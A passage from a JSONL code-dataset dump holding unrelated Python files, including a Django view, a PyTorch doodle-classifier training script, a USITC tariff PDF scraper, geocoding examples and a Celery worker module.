article_id):\n if request.method == 'POST':\n form = UserCommentsForm(request.POST)\n if form.is_valid():\n new_comment = Comments(text=request.POST['comment'], article_id_id=int(article_id))\n new_comment.save()\n return HttpResponse('

done

')\n if request.method == 'GET':\n data = serializers.serialize(\"json\", Comments.objects.filter(article_id=article_id))\n return HttpResponse(data, content_type='application/json')\n else:\n return HttpResponse({}, content_type='application/json')\n","sub_path":"python/django-projects/coookit_project/coookit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"268795522","text":"# -*- encoding: utf-8 -*- \n# @Contact : ynatsu233@outlook.com\n# @Time : 2019/5/5 19:02 \n# @Author : Natsu Yuki\n\n\nfrom flask import *\nfrom exts import db\nfrom models_sql import Book\nimport config\n\napp = Flask(__name__)\n\napp.config.from_object(config)\n\ndb.init_app(app)\n\nwith app.app_context():\n db.create_all()\n\n\n@app.route('/')\ndef index():\n return 'Hello World !'\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flaskScript.py","file_name":"flaskScript.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429700022","text":"##\n## 12. April. 2021\n## introduction of python\n##\n\n#simple py\nlanguages = ['python', 'perl', 'c', 'java']\n\nfor lang in languages:\n if lang in ['python', 'perl']:\n print(\"%6s need interpreter\" % lang)\n elif lang in ['c', 'java']:\n print(\"%6s need compiler\" % lang)\n else:\n print(\"should not reach here\")\n\n#\na = 80\nb = 75\nc = 55\n(a+b+c) / 3 # float 형으로 나옴.\n(a+b+c) // 3 # 소수점 짤림.\n\n","sub_path":"0_basic/1 - basic skills/basic_of_python.py","file_name":"basic_of_python.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"5073627","text":"\n\nfrom xai.brain.wordbase.nouns._filtrate import _FILTRATE\n\n#calss header\nclass _FILTRATING(_FILTRATE, ):\n\tdef __init__(self,): \n\t\t_FILTRATE.__init__(self)\n\t\tself.name = \"FILTRATING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"filtrate\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_filtrating.py","file_name":"_filtrating.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508418865","text":"# https://www.geeksforgeeks.org/find-m-th-smallest-value-in-k-sorted-arrays/\n\n\"\"\"\n\nGiven k sorted arrays of possibly different sizes, find m-th smallest value in the merged array.\n\nExamples:\n\nInput: m = 5\n arr[][] = { {1, 3},\n {2, 4, 6},\n {0, 9, 10, 11}} ;\nOutput: 4\nExplanation The merged array would\nbe {0 1 2 3 4 6 9 10 11}. The 5-th\nsmallest element in this merged\narray is 4.\n\nInput: M = 2\n arr[][] = { {1, 3, 20},\n {2, 4, 6}} ;\nOutput: 2\n\nInput: M = 6\n arr[][] = { {1, 3, 20},\n {2, 4, 6}} ;\nOutput: 20\n\n\"\"\"\n\nimport heapq\n\n\ndef m_smallest(lists, M) -> int:\n if not lists:\n return -1\n\n min_heap = []\n\n for i, l in enumerate(lists):\n if l:\n heapq.heappush(min_heap, (l[0], i, 1))\n\n candidate = -1\n while min_heap and M > 0:\n min_val, i, j = heapq.heappop(min_heap)\n\n if j < len(lists[i]):\n heapq.heappush(min_heap, (lists[i][j], i, j + 1))\n\n candidate, M = min_val, M - 1\n\n return candidate\n\n\ndef _test(lists, M, expected):\n actual = m_smallest(lists, M)\n\n assert actual == expected, 'Wrong answer, expected: {}, actual: {}'.format(expected, actual)\n print('Accepted')\n\n\nif __name__ == '__main__':\n lists, M = [[1, 3], [2, 4, 6], [0, 9, 10, 11]], 5\n _test(lists, M, 4)\n\n lists, M = [[1, 3, 20], [2, 4, 6]], 2\n _test(lists, M, 2)\n\n lists, M = [[1, 3, 20], [2, 4, 6]], 6\n _test(lists, M, 20)\n","sub_path":"Problems/companies/Facebook/Find_mth_smallest_in_k_sorted_arrays.py","file_name":"Find_mth_smallest_in_k_sorted_arrays.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"349790061","text":"#1 2 3 4 5 6 \ndef getAvg(arr):\n sumi=0\n n = len(arr)\n for i in arr:\n sumi = sumi + i\n print(sumi/n)\n\nnumbers=[int(i) for i in input().split()]\nnewnumbers=[-1,0,1,2,3,-4]\ngetAvg(arr=numbers)\ngetAvg(arr=newnumbers)","sub_path":"lesson8/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"417280545","text":"def numberOfPaths(p, q):\n # Create a 1D array to store\n # results of subproblems\n dp = [1]*q\n for i in range(p - 1):\n for j in range(1, q):\n dp[j] += dp[j - 1]\n return dp[q - 1]\n\nprint(numberOfPaths(3, 3))","sub_path":"TotalNumberOfwayTorReachMatrix.py","file_name":"TotalNumberOfwayTorReachMatrix.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"428469020","text":"# 2001-2009\n\nimport urllib.request, urllib.parse\nimport re\nimport os\nimport _locale\n\n_locale._getdefaultlocale = (lambda *args: ['en_US', 'utf8'])\n\ndef shellghost(pdfLinkList, fileNames):\n for i in range(len(pdfLinkList)):\n os.system('curl ' + pdfLinkList[i] + ' --output ' + fileNames[i] + '.pdf')\n os.system('gs -sDEVICE=txtwrite -o ' + fileNames[i] + '.txt ' + fileNames[i] + '.pdf')\n\n\ndef main(name):\n #srcfile = 'dataFile/' + name\n code = name[-2:]\n f = open(name + '.txt', 'r')\n filename = name + 'resolve.txt'\n file1 = open(filename, 'w+')\n content = f.read()\n ten_digit = re.compile(r'(\\d{4}\\.\\d{2}\\.\\d{2}\\s+(?:\\d{2})?)', flags=re.M)\n ten_digit_list = ten_digit.findall(content)\n array = []\n for i in range(len(ten_digit_list)):\n if ten_digit_list[i][0:2] == code:\n parsetwodigit(ten_digit_list, i, content, array)\n\n array = list(dict.fromkeys(array))\n for j in range(len(array)):\n temp = array[j]\n if len(temp) > 10:\n print(temp)\n\n file1.write(str(array))\n file1.close()\n f.close()\n\ndef special(name):\n f = open(name + '.txt', 'r')\n filename = name + 'resolve.txt'\n file1 = open(filename, 'w+')\n content = f.read()\n eight_digit = re.compile(r'(\\d{4}\\.\\d{2}\\.\\d{2})\\s{2,3}', flags=re.M)\n eight_digit_list = eight_digit.findall(content)\n array = []\n for i in range(len(eight_digit_list)):\n array.append(eight_digit_list[i])\n array = list(dict.fromkeys(array))\n result = []\n\n # if len(name) == 7:\n # newcode = name[-2:]\n # else:\n # code = name[-3:]\n # newcode = code[0:2] + '0' + code[-1]\n for j in range(len(array)):\n temp = array[j].replace(\"\\n\", \"\")\n temp = temp.replace(\" \", \"\")\n temp = temp.replace(\".\", \"\")\n result.append(temp)\n # if temp[0:4] == newcode and len(name) != 7:\n # result.append(temp)\n # if temp[0:2] == newcode and len(name) == 7:\n # result.append(temp)\n\n file1.write(str(result))\n file1.close()\n f.close()\n\n\ndef parsetwodigit(tendigitlist, i, content, array):\n if i == len(tendigitlist) - 1 :\n var = tendigitlist[i] + '(.+)'\n else:\n var = tendigitlist[i] + '(.+)' + tendigitlist[i + 1]\n pattern = re.compile(var, flags=re.M | re.DOTALL)\n pattern_list = pattern.findall(content)\n if len(pattern_list) == 0:\n print(tendigitlist[i])\n two_digit = re.compile('\\s\\s(\\d{2})\\s', flags=re.M)\n two_digit_list = two_digit.findall(pattern_list[0])\n temp = tendigitlist[i].replace(\"\\n\", \"\")\n temp = temp.replace(\" \", \"\")\n temp = temp.replace(\".\", \"\")\n # special case for chapter 98\n if len(two_digit_list) == 0:\n array.append(temp)\n for j in range(len(two_digit_list)):\n if len(temp) == 10:\n array.append(temp)\n string = temp[0:8] + two_digit_list[j]\n else:\n string = temp + two_digit_list[j]\n array.append(string)\n\nyear = '09'\n# todo: change according to the years\nurl = 'https://www.usitc.gov/tata/hts/bychapter/basic09.htm'\nresponse = urllib.request.urlopen(url)\nwebContent = str(response.read())\npdfLink = re.compile(r'(\\/publications\\/docs\\/tata\\/hts\\/bychapter\\/0900c\\d{2,3}(?:_\\d{1})?.pdf)', flags=re.M)\npdfLinkList = pdfLink.findall(webContent)\nprint(pdfLinkList)\nfor i in range(len(pdfLinkList)):\n pdfLinkList[i] = 'https://www.usitc.gov/' + pdfLinkList[i]\n\n# todo: change according to the years\npdfshort = re.compile(r'\\/(' + year + '00c\\d{2,3})(?:_\\d)?\\.pdf', flags=re.M)\nfileNames = pdfshort.findall(str(pdfLinkList))\n# shellghost(pdfLinkList, fileNames)\n\nfor i in range(len(fileNames)):\n if fileNames[i][-2:] == '99':\n special(fileNames[i])\n print(fileNames[i])\n else:\n main(fileNames[i])\n print(fileNames[i])\n\n# if __name__ == '__main__':\n# special('0200c99')\n# 2001-2002 link\n# url = 'https://www.usitc.gov/tata/hts/archive/' + year + '00/20' + year +'_basic_index.htm'\n# pdfLink = re.compile(r'(\\/tata\\/hts\\/archive\\/' + year + '00\\/'+ year + '00c\\d{2,3}\\.pdf)', flags=re.M)\n# 2003 link\n# url = 'https://www.usitc.gov/tata/hts/archive/20' + year +'/index.htm'\n# pdfLink = re.compile(r'(\\/publications\\/tariff_chapters_2003basic\\/' + year + '00c\\d{2,3}\\.pdf)', flags=re.M)\n# 2004-2008\n# url = 'https://www.usitc.gov/tata/hts/bychapter/_' + year +'00.htm'\n# pdfLink = re.compile(r'(\\/publications\\/docs\\/tata\\/hts\\/bychapter\\/' + year + '00c\\d{2,3}\\.pdf)', flags=re.M)\n# 2009\n# url = 'https://www.usitc.gov/tata/hts/bychapter/basic09.htm'\n# pdfLink = re.compile(r'(\\/publications\\/docs\\/tata\\/hts\\/bychapter\\/0900c\\d{2,3}_\\d{1}\\.pdf)', flags=re.M)\n# _number pdfshort = re.compile(r'\\/(0900c\\d{2,3}_\\d{1})\\.pdf', flags=re.M)\n# for i in range(len(fileNames)):\n# main(fileNames[i])\n# name = name[0:7]\n\n","sub_path":"dataFile/downloadpage200X.py","file_name":"downloadpage200X.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210101171","text":"# coding=utf-8\n\n# Query position by google map.\n# MyGEO / requests / http.client / socket\n\nimport requests\nimport json\nimport http.client\nimport socket\n\nclass MyGEO:\n def __init__(self):\n return\n \n def GetResult(self, address):\n response = requests.get(\"https://maps.googleapis.com/maps/api/geocode/json\", params={\"sensor\":\"false\", \"address\":address})\n response_json = response.json()\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n return [0., 0.]\n\ndef UsingRequests(address):\n response = requests.get(\"https://maps.googleapis.com/maps/api/geocode/json\", params={\"sensor\":\"false\", \"address\":address})\n response_json = response.json()\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n return [0., 0.]\n\ndef UsingHTTP(address):\n connection = http.client.HTTPConnection(\"maps.googleapis.com\")\n connection.request(\"GET\", \"/maps/api/geocode/json?address={0}&sensor=false\".format(address))\n response_json = json.loads(connection.getresponse().read())\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n \n return [0., 0.]\n \ndef UsingSocket(address):\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n connection.connect((\"maps.google.com\", 80))\n \n request_message = \"\"\"\\\nGET /maps/api/geocode/json?address={0}&sensor=false HTTP/1.1\\r\\n\\\nHOST: maps.google.com:80\\r\\n\\\nUser-Agent: Bihuchao\\r\\n\\\nConnection: Close\\r\\n\\\n\\r\\n\\\n \"\"\"\n \n connection.sendall(request_message.format(address).encode(\"ascii\"))\n \n data = b\"\"\n while(True):\n size = connection.recv(1024)\n if not size:\n break\n data += size\n \n response_json = json.loads(data.decode(\"utf-8\").split(\"\\r\\n\\r\\n\")[1])\n\n if response_json[\"status\"] == \"OK\": \n return response_json[\"results\"][0][\"geometry\"][\"location\"]\n \n return [0., 0.]\n\nif __name__ == \"__main__\":\n # using MyGEO\n result = MyGEO().GetResult(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n # using requests \n result = UsingRequests(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n # using http\n result = UsingHTTP(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n # using sokcet\n result = UsingSocket(\"taiyuan\")\n print(\"%.2f %.2f\" % (result[\"lat\"], result[\"lng\"]))\n \n","sub_path":"CodeOfPythonNetWorkProgramming/01/01_sendrequest.py","file_name":"01_sendrequest.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91685592","text":"# Zadanie 4\n# Napisz skrypt, który zapyta uzytkownika o trzy liczby calkowite,\n# a nastepnie pomnoz dwa pierwsze. przed podzieleniem wyniku przez trzecia liczbe. \n# Wejscie i wyjscie powinny byc zrozumiale dla uzytkownika.\n\nnum1 = int(input(\"Podaj pierwsza liczbe: \"))\nnum2 = int(input(\"Podaj druga liczbe: \"))\nnum3 = int(input(\"Podaj trzecia liczbe: \"))\n\nresult = num1 * num2 / num3\n\nprint(\"Wynik wynosi:\", result)","sub_path":"section2/exercise_4.py","file_name":"exercise_4.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62207524","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '1,2,3,8,9,12' #'3,2,1,0'\nimport sys\nsys.path.append(\"..\")\nfrom common import *\nfrom data import *\nfrom imgaug import augmenters as iaa\n\n##----------------------------------------\nfrom model_seresnext101 import *\n# from model_resnet34 import *\nimport gc\n\n\n# In[2]:\n#net = Net().to('cuda:0')\n#print(next(net.parameters()).is_cuda)\n\n#net = nn.DataParallel(net)\n#net.cuda()\n#print(next(net.parameters()).is_cuda)\n#print(net.weights)\n#print(type(net))\n\nFILE_NAME = '100k'\nSIZE = 196\n\n# In[3]:\n\n\ndef mixup_data(x, y, alpha=4.0, use_cuda=True):\n '''Returns mixed inputs, pairs of targets, and lambda'''\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n else:\n lam = 1\n\n batch_size = x.size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n mixed_x = lam * x + (1 - lam) * x[index, :]\n y_a, y_b = y, y[index]\n return mixed_x, y_a, y_b, lam\n\n\ndef mixup_criterion(criterion, pred, y_a, y_b, lam):\n return lam * criterion(pred, y_a) + (1 - lam) * criterion(pred, y_b)\n\n\n# In[4]:\n\n\ndef valid_augment(drawing, label, index):\n# image = drawing_to_image_with_color_v2(drawing, 96, 96)\n seq = iaa.Sequential([\n iaa.Crop(percent=(0.05, 0.05, \\\n 0.05, 0.05), keep_size=True)\n ])\n image = drawing_to_image_with_color_aug(drawing, SIZE, SIZE, seq)\n return image, label, None\n\n\ndef train_augment(drawing, label, index):\n up_rand = np.random.random()\n right_rand = np.random.random()\n percent_crop = 0.1\n seq = iaa.Sequential([\n iaa.Fliplr(0.5),\n iaa.Crop(percent=(up_rand*percent_crop, right_rand*percent_crop, \\\n (1-up_rand)*percent_crop, (1-right_rand)*percent_crop), keep_size=True)\n ])\n \n image = drawing_to_image_with_color_aug(drawing, SIZE, SIZE, seq)\n# image = drawing_to_image_with_color_v2(drawing, 96, 96)\n return image, label, None\n\n\n# In[5]:\n\n\n### training ##############################################################\n\ndef do_valid( net, valid_loader, criterion ):\n\n valid_num = 0\n probs = []\n truths = []\n losses = []\n corrects = []\n\n for input, truth, cache in valid_loader:\n input = input.to('cuda:0')\n truth = truth.to('cuda:0')\n\n with torch.no_grad():\n logit = net(input)#data_parallel(net,input)#net(input)\n prob = F.softmax(logit,1)\n\n loss = criterion(logit, truth, False)\n correct = metric(logit, truth, False)\n\n valid_num += len(input)\n probs.append(prob.data.cpu().numpy())\n losses.append(loss.data.cpu().numpy())\n corrects.append(correct.data.cpu().numpy())\n truths.append(truth.data.cpu().numpy())\n\n\n assert(valid_num == len(valid_loader.sampler))\n #------------------------------------------------------\n prob = np.concatenate(probs)\n correct = np.concatenate(corrects)\n truth = np.concatenate(truths).astype(np.int32).reshape(-1,1)\n loss = np.concatenate(losses)\n\n\n #---\n #top = np.argsort(-predict,1)[:,:3]\n\n loss = loss.mean()\n correct = correct.mean(0)\n\n top = [correct[0], correct[0]+correct[1], correct[0]+correct[1]+correct[2]]\n precision = correct[0]/1 + correct[1]/2 + correct[2]/3\n\n #----\n valid_loss = np.array([\n loss, top[0], top[2], precision\n ])\n\n return valid_loss\n\n\n# In[6]:\n\n\nfold = 0\nout_dir = '../../output'\ninitial_checkpoint = '/rscratch/xuanyu/KAIL/Kaggle_Doddle_Rank1/Alexander/output/checkpoint/00102000_model.pth'#'densenet201.pth'#None #\\\n #'../../output/backup/873_crop.pth'\n\npretrain_file = None\n\nbatch_size = 512+64\nepoch = 20\nnum_iters = epoch * 340 * 100000 // batch_size\n\n# schduler = NullScheduler(lr=0.01)\nschduler = DecayScheduler(base_lr=0.001, decay=0.1, step=num_iters/2)\niter_save_interval = 2000\ncriterion = softmax_cross_entropy_criterion\n\n\n## setup -----------------------------------------------------------------------------\nos.makedirs(out_dir +'/checkpoint', exist_ok=True)\nos.makedirs(out_dir +'/train', exist_ok=True)\nos.makedirs(out_dir +'/backup', exist_ok=True)\n# backup_project_as_zip(PROJECT_PATH, out_dir +'/backup/code.train.%s.zip'%IDENTIFIER)\n\nlog = Logger()\nlog.open(out_dir+'/log.train_r50_add_crop.txt',mode='a')\nlog.write('\\n--- [START %s] %s\\n\\n' % (IDENTIFIER, '-' * 64))\nlog.write('\\tSEED = %u\\n' % SEED)\nlog.write('\\tPROJECT_PATH = %s\\n' % PROJECT_PATH)\nlog.write('\\t__file__ = %s\\n' % FILE_NAME)\nlog.write('\\tout_dir = %s\\n' % out_dir)\nlog.write('\\n')\nlog.write('\\t\\n')\nlog.write('\\t ... xxx baseline ... \\n')\nlog.write('\\n')\n\n\n## dataset ----------------------------------------\nlog.write('** dataset setting **\\n')\n\ntrain_dataset = DoodleDataset('train', 'train_0', train_augment)\ntrain_loader = DataLoader(\n train_dataset,\n #sampler = FixLengthRandomSamplerWithProbability(train_dataset, probability),\n #sampler = FixLengthRandomSampler(train_dataset),\n #sampler = ConstantSampler(train_dataset,[31]*batch_size*100),\n sampler = RandomSampler(train_dataset),\n batch_size = batch_size,\n num_workers = 15,\n drop_last = True,\n pin_memory = False,\n collate_fn = null_collate)\n\nvalid_dataset = DoodleDataset('valid', 'valid_0', valid_augment)\nvalid_loader = DataLoader(\n valid_dataset,\n #sampler = SequentialSampler(valid_dataset),\n sampler = RandomSampler(valid_dataset),\n batch_size = batch_size,\n num_workers = 15,\n drop_last = False,\n pin_memory = True,\n collate_fn = null_collate)\n\n\nassert(len(train_dataset)>=batch_size)\nlog.write('batch_size = %d\\n'%(batch_size))\nlog.write('train_dataset : \\n%s\\n'%(train_dataset))\nlog.write('valid_dataset : \\n%s\\n'%(valid_dataset))\nlog.write('\\n')\n\n## net ----------------------------------------\nlog.write('** net setting **\\n')\n#net = Net().cuda()\nnet = Net().to('cuda:0')\nnet = nn.DataParallel(net)\nnet.cuda()\n#cudnn.benchmark = True\n\nif initial_checkpoint is not None:\n log.write('\\tinitial_checkpoint = %s\\n' % initial_checkpoint)\n net.load_state_dict(torch.load(initial_checkpoint, map_location=lambda storage, loc: storage))\n#net = nn.DataParallel(net)\n#net.cuda()\n\n\n# In[ ]:\n\n\nlog.write('%s\\n'%(type(net)))\nlog.write('criterion=%s\\n'%criterion)\nlog.write('\\n')\n\n\n## optimiser ----------------------------------\nif 0: ##freeze\n for p in net.resnet.parameters(): p.requires_grad = False\n for p in net.encoder1.parameters(): p.requires_grad = False\n for p in net.encoder2.parameters(): p.requires_grad = False\n for p in net.encoder3.parameters(): p.requires_grad = False\n for p in net.encoder4.parameters(): p.requires_grad = False\n pass\n\n#net.set_mode('train',is_freeze_bn=True)\n#-----------------------------------------------\n\n\noptimizer = optim.SGD(filter(lambda p: p.requires_grad, net.parameters()),\n lr=schduler.get_rate(0), momentum=0.9, weight_decay=0.0001)\n\n\niter_smooth = 20\niter_log = 50\niter_valid = 2500\niter_save = [0, num_iters-1] + list(range(0, num_iters, iter_save_interval))#1*1000\n\nstart_iter = 102000\nstart_epoch= 0\nrate = 0\nif initial_checkpoint is not None:\n# initial_optimizer = initial_checkpoint.replace('_model.pth','_optimizer.pth')\n# checkpoint = torch.load(initial_optimizer)\n# start_iter = checkpoint['iter' ]\n# start_epoch = checkpoint['epoch']\n\n #rate = get_learning_rate(optimizer) #load all except learning rate\n #optimizer.load_state_dict(checkpoint['optimizer'])\n #adjust_learning_rate(optimizer, rate)\n pass\n\n\n\n\nlog.write('schduler\\n %s\\n'%(schduler))\nlog.write('\\n')\n\n## start training here! ##############################################\nlog.write('** start training here! **\\n')\nlog.write(' |------------ VALID -------------|-------- TRAIN/BATCH ----------| \\n')\nlog.write('rate iter epoch | loss acc-1 acc-3 lb | loss acc-1 acc-3 lb | time \\n')\nlog.write('----------------------------------------------------------------------------------------------------\\n')\n\n\ntrain_loss = np.zeros(6,np.float32)\nvalid_loss = np.zeros(6,np.float32)\nbatch_loss = np.zeros(6,np.float32)\niter = 0\ni = 0\nlast_max_lb = -1\n\n\nstart = timer()\nwhile iter 0:\n await self.bot.send_message(self.channel, \"\\n\".join(self.buffer))\n self.buffer.clear()\n await asyncio.sleep(5)\n \n def close(self):\n self.run = False\n self.buffer.clear()\n super.close()\n\nclass DiscordLoggingFormatter(logging.Formatter):\n def format(self, r):\n msg = re.sub(r\"\\u001b\\[\\d+(?:;\\d+)?m\", \"\", r.msg)\n return f\"``{r.levelname}:{r.name}@{datetime.now()}\\n{msg}``\"\n","sub_path":"util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"259593073","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n''' Программа выводит название региона РФ по коду с номера автомобиля\nвводим значение и получаем результат. \n'''\n# Используем колораму для подсветки\nfrom colorama import Fore, Back, Style\n\n# Открываем файл на чтение\nf = open('short.db', 'r', encoding='UTF-8')\n\nd = {}\n# Читаем файл в память\nfor line in f:\n kv = line.split(':')\n key = kv[0]\n value = kv[1]\n\n d[key] = value\n\n\ndef vvod():\n # Здесь мы работаем с юзером\n print(Style.RESET_ALL + \"Введите код региона! 0 - для выхода\")\n code = input()\n if code == '0':\n exit(0)\n exist_key = code in d\n if exist_key == False:\n print(Fore.RED + 'Такого кода в базе нет!')\n vvod()\n\n print(Fore.GREEN + d[code])\n vvod()\n\n\nvvod()\n","sub_path":"code_r2.py","file_name":"code_r2.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"384492573","text":"import atexit\nimport logging\nimport multiprocessing\nimport platform as _platform\nimport os\nimport socket\nimport sys\nimport warnings\n\nfrom celery import __version__\nfrom celery import platforms\nfrom celery import signals\nfrom celery.exceptions import ImproperlyConfigured\nfrom celery.routes import Router\nfrom celery.task import discard_all\nfrom celery.utils import get_full_cls_name, LOG_LEVELS\nfrom celery.utils import info\nfrom celery.utils import term\nfrom celery.worker import WorkController\n\n\nSYSTEM = _platform.system()\nIS_OSX = SYSTEM == \"Darwin\"\n\nSTARTUP_INFO_FMT = \"\"\"\nConfiguration ->\n . broker -> %(conninfo)s\n . queues ->\n%(queues)s\n . concurrency -> %(concurrency)s\n . loader -> %(loader)s\n . logfile -> %(logfile)s@%(loglevel)s\n . events -> %(events)s\n . beat -> %(celerybeat)s\n%(tasks)s\n\"\"\".strip()\n\nTASK_LIST_FMT = \"\"\" . tasks ->\\n%s\"\"\"\n\n\nclass Worker(object):\n WorkController = WorkController\n\n def __init__(self, concurrency=None, loglevel=None, logfile=None,\n hostname=None, discard=False, run_clockservice=False,\n schedule=None, task_time_limit=None, task_soft_time_limit=None,\n max_tasks_per_child=None, queues=None, events=False, db=None,\n include=None, defaults=None, pidfile=None,\n redirect_stdouts=None, redirect_stdouts_level=None, **kwargs):\n if defaults is None:\n from celery import conf\n defaults = conf\n self.defaults = defaults\n self.concurrency = (concurrency or\n defaults.CELERYD_CONCURRENCY or\n multiprocessing.cpu_count())\n self.loglevel = loglevel or defaults.CELERYD_LOG_LEVEL\n self.logfile = logfile or defaults.CELERYD_LOG_FILE\n self.hostname = hostname or socket.gethostname()\n self.discard = discard\n self.run_clockservice = run_clockservice\n self.schedule = schedule or defaults.CELERYBEAT_SCHEDULE_FILENAME\n self.events = events\n self.task_time_limit = (task_time_limit or\n defaults.CELERYD_TASK_TIME_LIMIT)\n self.task_soft_time_limit = (task_soft_time_limit or\n defaults.CELERYD_TASK_SOFT_TIME_LIMIT)\n self.max_tasks_per_child = (max_tasks_per_child or\n defaults.CELERYD_MAX_TASKS_PER_CHILD)\n self.redirect_stdouts = (redirect_stdouts or\n defaults.REDIRECT_STDOUTS)\n self.redirect_stdouts_level = (redirect_stdouts_level or\n defaults.REDIRECT_STDOUTS_LEVEL)\n self.db = db\n self.queues = queues or []\n self.include = include or []\n self.pidfile = pidfile\n self._isatty = sys.stdout.isatty()\n self.colored = term.colored(enabled=defaults.CELERYD_LOG_COLOR)\n\n if isinstance(self.queues, basestring):\n self.queues = self.queues.split(\",\")\n if isinstance(self.include, basestring):\n self.include = self.include.split(\",\")\n\n if not isinstance(self.loglevel, int):\n try:\n self.loglevel = LOG_LEVELS[self.loglevel.upper()]\n except KeyError:\n self.die(\"Unknown level %r. Please use one of %s.\" % (\n self.loglevel,\n \"|\".join(l for l in LOG_LEVELS.keys()\n if isinstance(l, basestring))))\n\n def run(self):\n self.init_loader()\n self.init_queues()\n self.worker_init()\n self.redirect_stdouts_to_logger()\n print(str(self.colored.cyan(\n \"celery@%s v%s is starting.\" % (self.hostname, __version__))))\n\n if getattr(os, \"geteuid\", None) and os.geteuid() == 0:\n warnings.warn(\n \"Running celeryd with superuser privileges is not encouraged!\")\n\n if getattr(self.settings, \"DEBUG\", False):\n warnings.warn(\"Using settings.DEBUG leads to a memory leak, \"\n \"never use this setting in a production environment!\")\n\n if self.discard:\n self.purge_messages()\n\n # Dump configuration to screen so we have some basic information\n # for when users sends bug reports.\n print(str(self.colored.reset(\" \\n\", self.startup_info())))\n self.set_process_status(\"Running...\")\n\n self.run_worker()\n\n def on_listener_ready(self, listener):\n signals.worker_ready.send(sender=listener)\n print(\"celery@%s has started.\" % self.hostname)\n\n def init_queues(self):\n conf = self.defaults\n if self.queues:\n conf.QUEUES = dict((queue, options)\n for queue, options in conf.QUEUES.items()\n if queue in self.queues)\n for queue in self.queues:\n if queue not in conf.QUEUES:\n if conf.CREATE_MISSING_QUEUES:\n Router(queues=conf.QUEUES).add_queue(queue)\n else:\n raise ImproperlyConfigured(\n \"Queue '%s' not defined in CELERY_QUEUES\" % queue)\n\n def init_loader(self):\n from celery.loaders import current_loader, load_settings\n self.loader = current_loader()\n self.settings = load_settings()\n if not self.loader.configured:\n raise ImproperlyConfigured(\n \"Celery needs to be configured to run celeryd.\")\n map(self.loader.import_module, self.include)\n\n def redirect_stdouts_to_logger(self):\n from celery import log\n handled = log.setup_logging_subsystem(loglevel=self.loglevel,\n logfile=self.logfile)\n # Redirect stdout/stderr to our logger.\n if not handled:\n logger = log.get_default_logger()\n if self.redirect_stdouts:\n log.redirect_stdouts_to_logger(logger,\n loglevel=self.redirect_stdouts_level)\n\n def purge_messages(self):\n discarded_count = discard_all()\n what = discarded_count > 1 and \"messages\" or \"message\"\n print(\"discard: Erased %d %s from the queue.\\n\" % (\n discarded_count, what))\n\n def worker_init(self):\n # Run the worker init handler.\n # (Usually imports task modules and such.)\n self.loader.init_worker()\n\n def tasklist(self, include_builtins=True):\n from celery.registry import tasks\n tasklist = tasks.keys()\n if not include_builtins:\n tasklist = filter(lambda s: not s.startswith(\"celery.\"),\n tasklist)\n return TASK_LIST_FMT % \"\\n\".join(\"\\t. %s\" % task\n for task in sorted(tasklist))\n\n def startup_info(self):\n tasklist = \"\"\n if self.loglevel <= logging.INFO:\n include_builtins = self.loglevel <= logging.DEBUG\n tasklist = self.tasklist(include_builtins=include_builtins)\n\n queues = self.defaults.get_queues()\n\n return STARTUP_INFO_FMT % {\n \"conninfo\": info.format_broker_info(),\n \"queues\": info.format_queues(queues, indent=8),\n \"concurrency\": self.concurrency,\n \"loglevel\": LOG_LEVELS[self.loglevel],\n \"logfile\": self.logfile or \"[stderr]\",\n \"celerybeat\": self.run_clockservice and \"ON\" or \"OFF\",\n \"events\": self.events and \"ON\" or \"OFF\",\n \"tasks\": tasklist,\n \"loader\": get_full_cls_name(self.loader.__class__),\n }\n\n def run_worker(self):\n if self.pidfile:\n pidlock = platforms.create_pidlock(self.pidfile).acquire()\n atexit.register(pidlock.release)\n worker = 